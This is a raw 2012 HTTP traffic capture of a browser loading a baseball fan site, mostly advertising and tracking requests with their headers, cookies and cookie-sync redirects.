Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 17-Feb-2013 04:17:37 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 20-Nov-2012 04:17:37 GMT; domain=.adnxs.com; HttpOnly icu=ChII4LcDEAoYASABKAEw4eWmhQUQ4eWmhQUYAA..; path=/; expires=Sun, 17-Feb-2013 04:17:37 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FQUoEhxBTqzB-6V-ZbE(Q-FbEN!/vP[bh#%'@AF; path=/; expires=Sun, 17-Feb-2013 04:17:37 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 19 Nov 2012 04:17:37 GMT
Content-Length: 844
GET /AdServer/js/freq.html HTTP/1.1

Host: ads.pubmatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PUBMDCID=3; KADUSERCOOKIE=CC78ACA8-9353-43AF-B346-6DE47ACCFD06; pubfreq_28597=; pubtime_28597=TMC; pubfreq_28597_24361_791307272=1425-1; PMDTSHR=cat:
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 Apr 2012 09:34:29 GMT
Etag: &quot;19309ce-18b-e5963340&quot;
Accept-Ranges: bytes
Content-Encoding: gzip
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;, CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Content-Length: 247
Expires: Mon, 19 Nov 2012 04:17:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 19 Nov 2012 04:17:37 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /AdServer/js/dppix.html?p=28596&s=28597&a=24361 HTTP/1.1

Host: ads.pubmatic.com
GET /AdServer/js/dppix.html?p=28596&amp;s=28597&amp;a=24361 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PUBMDCID=3; KADUSERCOOKIE=CC78ACA8-9353-43AF-B346-6DE47ACCFD06; pubfreq_28597=; pubtime_28597=TMC; pubfreq_28597_24361_791307272=1425-1; PMDTSHR=cat:
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Expires: Wed, 21 Nov 2012 00:44:04 GMT
Last-Modified: Thu, 15 Nov 2012 10:17:39 GMT
Etag: &quot;1930c6c-1fe7-f5f096c0&quot;
Cache-Control: max-age=172800
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Content-Encoding: gzip
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;, CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Content-Length: 2845
Date: Mon, 19 Nov 2012 04:17:37 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /AdServer/js/syncuppixels.html?p=28596&s=28597 HTTP/1.1

Host: ads.pubmatic.com
GET /AdServer/js/syncuppixels.html?p=28596&amp;s=28597 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PUBMDCID=3; KADUSERCOOKIE=CC78ACA8-9353-43AF-B346-6DE47ACCFD06; pubfreq_28597=; pubtime_28597=TMC; pubfreq_28597_24361_791307272=1425-1; PMDTSHR=cat:
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Expires: Wed, 21 Nov 2012 00:43:22 GMT
Last-Modified: Thu, 15 Nov 2012 10:17:38 GMT
Etag: &quot;1930c5e-4136-f5e15480&quot;
Cache-Control: max-age=172800
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Content-Encoding: gzip
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;, CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Content-Length: 4999
Date: Mon, 19 Nov 2012 04:17:37 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /p/cb/23/22/a4/cb2322a48bc54909477900bd9385df48.jpg HTTP/1.1

Host: cdn.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FQUoEhxBTqzB-6V-ZbE(Q-FbEN!/vP[bh#%'@AF; sess=1; icu=ChII4LcDEAoYASABKAEw4eWmhQUQ4eWmhQUYAA..
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: Apache
Etag: &quot;cb2322a48bc54909477900bd9385df48:1347914652&quot;
Last-Modified: Mon, 17 Sep 2012 20:44:12 GMT
Accept-Ranges: bytes
Content-Length: 31531
Date: Mon, 19 Nov 2012 04:17:37 GMT
Connection: keep-alive
GET /AdServer/js/cutildee6d705a5077f097c8c64e02d002b24.js HTTP/1.1

Host: ads.pubmatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/freq.html
Cookie: PUBMDCID=3; KADUSERCOOKIE=CC78ACA8-9353-43AF-B346-6DE47ACCFD06; pubfreq_28597=; pubtime_28597=TMC; pubfreq_28597_24361_791307272=1425-1; PMDTSHR=cat:
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 10 Jul 2012 09:55:27 GMT
Etag: &quot;1930a25-22c7-badbe1c0&quot;
Accept-Ranges: bytes
Cache-Control: max-age=90400000, public
Expires: Mon, 29 Oct 2012 20:40:44 GMT
Content-Encoding: gzip
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;, CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Content-Length: 2708
Date: Mon, 19 Nov 2012 04:17:37 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /AdServer/AdDisplayTrackerServlet?operId=1&pubId=28596&siteId=28597&adId=24361&adServerId=1425&kefact=0.050000&kaxefact=0.050000&kadNetFrequecy=1&kadwidth=728&kadheight=90&kadsizeid=7&kltstamp=1353298656&indirectAdId=0&adServerOptimizerId=2&ranreq=0.5295620945665518&kpbmtpfact=0.000000&imprCap=1&pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: track.pubmatic.com
GET /AdServer/AdDisplayTrackerServlet?operId=1&amp;pubId=28596&amp;siteId=28597&amp;adId=24361&amp;adServerId=1425&amp;kefact=0.050000&amp;kaxefact=0.050000&amp;kadNetFrequecy=1&amp;kadwidth=728&amp;kadheight=90&amp;kadsizeid=7&amp;kltstamp=1353298656&amp;indirectAdId=0&amp;adServerOptimizerId=2&amp;ranreq=0.5295620945665518&amp;kpbmtpfact=0.000000&amp;imprCap=1&amp;pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PUBMDCID=3; KADUSERCOOKIE=CC78ACA8-9353-43AF-B346-6DE47ACCFD06; pubfreq_28597=; pubtime_28597=TMC; pubfreq_28597_24361_791307272=1425-1; PMDTSHR=cat:
HTTP/1.1 200 OK

Content-Type: text/html
Date: Mon, 19 Nov 2012 04:17:37 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1

Host: view.atdmt.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: AA002=1350344862-22301988; MUID=28A467A70F8D6B9C1F16645D0C8D6BFA
HTTP/1.1 200 OK

Content-Type: text/html
Cache-Control: no-store
Content-Encoding: gzip
Expires: 0
Vary: Accept-Encoding
Date: Mon, 19 Nov 2012 04:17:36 GMT
Connection: close
Content-Length: 381
GET /images/pixel.gif HTTP/1.1

Host: spe.atdmt.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
Cookie: AA002=1350344862-22301988; MUID=28A467A70F8D6B9C1F16645D0C8D6BFA
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 42
Allow: GET
Expires: Sun, 25 Nov 2012 09:33:10 GMT
Date: Mon, 19 Nov 2012 04:17:37 GMT
Connection: keep-alive
GET /templates/yoo_bigeasy/images/menu_dropdown_level1.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.fenwaywest.com/templates/yoo_bigeasy/css/menus.css
Cookie: __qca=P0-1109205847-1353298656085; cto_rtt=; UnicaNIODID=iYQ8T442WFr-XzLhPSG
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:37 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:19:54 GMT
Etag: &quot;eccb25-49-4c387595b4e80&quot;
Accept-Ranges: bytes
Content-Length: 73
Keep-Alive: timeout=5, max=494
Connection: Keep-Alive
GET /pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1350344862-22301988%7cMUID%3d28a467a70f8d6b9c1f16645d0c8d6bfa%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1

Host: ib.adnxs.com
GET /pxj?bidder=55&amp;action=SetAdMarketCookies(%22AA002%3d1350344862-22301988%7cMUID%3d28a467a70f8d6b9c1f16645d0c8d6bfa%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FQUoEhxBTqzB-6V-ZbE(Q-FbEN!/vP[bh#%'@AF; sess=1; icu=ChII4LcDEAoYASABKAEw4eWmhQUQ4eWmhQUYAA..
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 17-Feb-2013 04:17:37 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 20-Nov-2012 04:17:37 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FQUoEhxBTqzB-6V-ZbE(Q-FbEN!/vP[bh#%'@AF; path=/; expires=Sun, 17-Feb-2013 04:17:37 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Date: Mon, 19 Nov 2012 04:17:37 GMT
GET /load/?p=204&g=071&j=0&buid=CC78ACA8-9353-43AF-B346-6DE47ACCFD06 HTTP/1.1

Host: loadm.exelator.com
GET /load/?p=204&amp;g=071&amp;j=0&amp;buid=CC78ACA8-9353-43AF-B346-6DE47ACCFD06 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=28596&amp;s=28597&amp;a=24361
HTTP/1.1 302 Found

Content-Type: image/gif
X-Powered-By: PHP/5.3.17
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Set-Cookie: ud=eJxrWVyWWnRgUUnxaccrWjk7wvoLF4d6utxiUEg1NzUwNjCwsDA2skg2Skw2Tk0xMjVJTDRNTrFMSjUyW1yUksYIABOtFlg%253D; expires=Tue, 19-Mar-2013 04:17:37 GMT; path=/; domain=exelator.com
Location: http://loadm.exelator.com/load/?p=204&amp;g=071&amp;j=0&amp;buid=CC78ACA8-9353-43AF-B346-6DE47ACCFD06&amp;xl8blockcheck=1
Content-Length: 0
Connection: close
Date: Mon, 19 Nov 2012 04:17:37 GMT
Server: HTTP server
GET /pubmatic_sync?pubmatic_callback=http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM5MCZ0bD0xMjk2MDA=&piggybackCookie= HTTP/1.1

Host: pixel.invitemedia.com
GET /pubmatic_sync?pubmatic_callback=http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM5MCZ0bD0xMjk2MDA=&amp;piggybackCookie= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=28596&amp;s=28597
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Mon, 19 Nov 2012 04:17:37 GMT
Set-Cookie: uid=db273952-68a4-4097-8df2-7d98b16e5711;Path=/;Domain=invitemedia.com;Expires=Tue, 19-Nov-2013 04:17:37 GMT impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM5MCZ0bD0xMjk2MDA%3D&amp;piggybackCookie=db273952-68a4-4097-8df2-7d98b16e5711.
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)
GET /load/?p=204&g=071&j=0&buid=CC78ACA8-9353-43AF-B346-6DE47ACCFD06&xl8blockcheck=1 HTTP/1.1

Host: loadm.exelator.com
GET /load/?p=204&amp;g=071&amp;j=0&amp;buid=CC78ACA8-9353-43AF-B346-6DE47ACCFD06&amp;xl8blockcheck=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=28596&amp;s=28597&amp;a=24361
Cookie: ud=eJxrWVyWWnRgUUnxaccrWjk7wvoLF4d6utxiUEg1NzUwNjCwsDA2skg2Skw2Tk0xMjVJTDRNTrFMSjUyW1yUksYIABOtFlg%253D
HTTP/1.1 302 Found

Content-Type: image/gif
X-Powered-By: PHP/5.3.17
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Set-Cookie: inv=eJxrXFySlnaHQeLMGXfms%252BocS4wMTSzAxFl1bgSHAcE8c4aBEYnLgMIDAAOcF04%253D; expires=Tue, 19-Mar-2013 04:17:37 GMT; path=/; domain=exelator.com xud=eJyNz8tKw0AUBuAq7nyJLFwJgWQmk0yX01xqoGZCLkhAiLlMMJA2kMS2LgX3voI0hVKruPUdxJ2rPo2hzQO4%252FH%252B%252Bcw7nuZ2z6mzV1N%252Fk97L4ur07Xy%252BLpnhpfVPbDzimIAEKAsYQ4ARECWQpQFIUoSQdxgzIu4c8DV0gSLY%252F2g8uVFXBRCWYH0IEeQkSgx9BSeZlTZcUoqqGJsgf83Cs01ClvuU5wcqi78fC0ccmtVYieOuB6QVrWhfl9pi1azLoqU1dj0xeP4%252BJODrp1mn6oJM%252BCb3A1jejqlzUrNodGoNcm5NgY%252BQVy8rl5tBRd3uTz9JOcUp%252FwXTt7mW7XLDKY8k9Z86ysppGTV7OOPexbti05ojbY%252BqM%252F48t3TttfXLVTchppsRJlApMgiLCGQJIiJAiC0mEGY7FNs6yp5%252BT%252BRqIEv4DtWqOkw%253D%253D; expires=Tue, 19-Mar-2013 04:17:37 GMT; path=/; domain=exelator.com xudx=eJwBLwDQ%252F4OjdmVyAqJ0c8tB1CpsuFxgC6NldniBzQhkgc5QqbLhmc0nCwHMzEcBAAHNAXYBCEgUPg%253D%253D; expires=Tue, 19-Mar-2013 04:17:37 GMT; path=/; domain=exelator.com udo=eJyNkEtqg1AUhjWjQDbhoFAoCMbr42Z446tCohKVIhSs0WsrmAhqTbqAjruBDkoMhDQtnXYPTWYdZTWVxAV0%252BH98%252Fzmc81xXOO%252BsyuIH%252FV6l37d3vRpXy9fDZY88dKPufq8RJEEeyIpcL9MyfaldXT4SFBZ5BjAMhICFIRuEAEcszwUBH0aDKWaF3WMS%252BTbLcJY7PBIXkiRCJCFIDwAPaA4glR4CTqAFWeFEJEmqzAifla8ppi%252BZruFMvJVhfpzBRNF001j12fdW0B1vbRZptj1neYyIVrVM20Gjt69zQhMFNeNkhWhMF%252FmOZymbYZ4tCpzvTkRFY33kbdQkx3G23JyYaW9vknnUWJTYbtBtqznZyhY4d3D4QOnzOMtnQZlkc8p%252BKko8Kyhkt7I50f4vG4rTqV103TSEKBanYRAxmAN9HsY8yzMBLwpMGEAMp%252F11lif3zVf%252BAE7tlRY%253D; expires=Tue, 19-Mar-2013 04:17:37 GMT; path=/; domain=exelator.com ud=eJxrWVyWWnRgUUnxaccrWjk7YjKXLg71dLnFoJBqbmpgbGBgYWFsZJFslJhsnJpiZGqSmGianGKZlGpktiS%252FKDN9kZ8%252FAF8aGCA%253D; expires=Tue, 19-Mar-2013 04:17:37 GMT; path=/; domain=exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Connection: close
Date: Mon, 19 Nov 2012 04:17:37 GMT
Server: HTTP server
GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM5MCZ0bD0xMjk2MDA%3D&piggybackCookie=db273952-68a4-4097-8df2-7d98b16e5711. HTTP/1.1

Host: image2.pubmatic.com
GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM5MCZ0bD0xMjk2MDA%3D&amp;piggybackCookie=db273952-68a4-4097-8df2-7d98b16e5711. HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=28596&amp;s=28597
Cookie: PUBMDCID=3; KADUSERCOOKIE=CC78ACA8-9353-43AF-B346-6DE47ACCFD06; pubfreq_28597=; pubtime_28597=TMC; pubfreq_28597_24361_791307272=1425-1; PMDTSHR=cat:; KTPCACOOKIE=YES; DPPIX_ON=YES; SYNCUPPIX_ON=YES
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:37 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_80=1336-db273952-68a4-4097-8df2-7d98b16e5711.; domain=pubmatic.com; expires=Wed, 19-Nov-2014 04:17:37 GMT; path=/ PUBRETARGET=390_1361074657; domain=pubmatic.com; expires=Sun, 17-Feb-2013 04:17:37 GMT; path=/
Content-Length: 42
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Connection: close
GET /adj/yb.fenwaywest/;chan1=mlb;rating=pg;dcopt=;yb=ad;s1=;s2=;tile=2;sz=160x600;ord=5887935212? HTTP/1.1

Host: ad.doubleclick.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=UTF-8
Server: DCLK-AdSvr
Content-Length: 1176
Content-Encoding: gzip
Date: Mon, 19 Nov 2012 04:17:37 GMT
GET /TagPublish/GetAd.aspx?tagver=1&cp=520266&ct=66902&cn=1&crtg=&cwod=&epid=&esid=&ifurl=&tppg=&cf=160X600&rq=1&dw=300&cwu=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&cwr=&mrnd=87072411&if=1&tl=-1&pxy=&cxy=&dxy=&tz=-60&ln=en-US HTTP/1.1

Host: tag.contextweb.com
GET /TagPublish/GetAd.aspx?tagver=1&amp;cp=520266&amp;ct=66902&amp;cn=1&amp;crtg=&amp;cwod=&amp;epid=&amp;esid=&amp;ifurl=&amp;tppg=&amp;cf=160X600&amp;rq=1&amp;dw=300&amp;cwu=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;cwr=&amp;mrnd=87072411&amp;if=1&amp;tl=-1&amp;pxy=&amp;cxy=&amp;dxy=&amp;tz=-60&amp;ln=en-US HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=CT-USR; cw=cw
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: http://ak1.abmr.net/is/tag.contextweb.com?U=/TagPublish/GetAd.aspx&amp;V=3-aFY9YKHobFqvzZT2uBEmkP51UVeyIJyEhl6LJP49lekSmGz9u4J2Tqb24YtTu77L&amp;I=9AAB955FA98BAC4&amp;D=contextweb.com&amp;01AD=1&amp;tagver=1&amp;cp=520266&amp;ct=66902&amp;cn=1&amp;crtg=&amp;cwod=&amp;epid=&amp;esid=&amp;ifurl=&amp;tppg=&amp;cf=160X600&amp;rq=1&amp;dw=300&amp;cwu=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;cwr=&amp;mrnd=87072411&amp;if=1&amp;tl=-1&amp;pxy=&amp;cxy=&amp;dxy=&amp;tz=-60&amp;ln=en-US
Date: Mon, 19 Nov 2012 04:17:37 GMT
Connection: keep-alive
Set-Cookie: C2W4=CT-1; expires=Mon, 17-Dec-2012 04:17:37 GMT; path=/; domain=.contextweb.com
GET /is/tag.contextweb.com?U=/TagPublish/GetAd.aspx&V=3-aFY9YKHobFqvzZT2uBEmkP51UVeyIJyEhl6LJP49lekSmGz9u4J2Tqb24YtTu77L&I=9AAB955FA98BAC4&D=contextweb.com&01AD=1&tagver=1&cp=520266&ct=66902&cn=1&crtg=&cwod=&epid=&esid=&ifurl=&tppg=&cf=160X600&rq=1&dw=300&cwu=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&cwr=&mrnd=87072411&if=1&tl=-1&pxy=&cxy=&dxy=&tz=-60&ln=en-US HTTP/1.1

